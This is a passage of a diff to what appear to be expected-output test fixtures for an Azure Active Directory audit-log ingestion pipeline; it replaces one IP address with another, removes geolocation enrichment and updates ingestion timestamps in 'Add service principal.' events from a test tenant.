- "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -14083,7 +12859,7 @@ "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", 
@@ -14226,7 +13002,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -14238,12 +13014,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036464500Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.Serv
icePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n 
\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125231900Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) 
Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n 
}\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -14269,25 +13045,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -14301,7 +13059,7 @@ "ObjectId": "7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", 
@@ -14444,7 +13202,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -14456,12 +13214,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036468600Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.Serv
icePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n 
\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125238800Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:31\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AccountEnabled\\\",\\\"AppPrincipalId\\\",\\\"DisplayName\\\",\\\"ServicePrincipalName\\\",\\\"Credential\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"381d015d-6660-4dce-af99-4cd8c3b61d4d\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) 
Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:31.1327910Z\"},{\"Name\":\"env_epoch\",\"Value\":\"NNJOH\"},{\"Name\":\"env_seqNum\",\"Value\":\"39121960\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##d409567a-16bf-49cb-a4c9-cb4608f62168_00000000-0000-0000-0000-000000000000_d409567a-16bf-49cb-a4c9-cb4608f62168\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR568\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"48403af8-b712-4e63-a999-686b631240ac\",\"ModifiedProperties\":[{\"Name\":\"AccountEnabled\",\"NewValue\":\"[\\r\\n true\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AppPrincipalId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"ServicePrincipalName\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Credential\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"CredentialType\\\": 2,\\r\\n \\\"KeyStoreId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\",\\r\\n \\\"KeyGroupId\\\": \\\"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\\\"\\r\\n 
}\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AccountEnabled, AppPrincipalId, DisplayName, ServicePrincipalName, Credential\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"}],\"ObjectId\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Operation\":\"Add service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":2},{\"ID\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", @@ -14487,25 +13245,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": 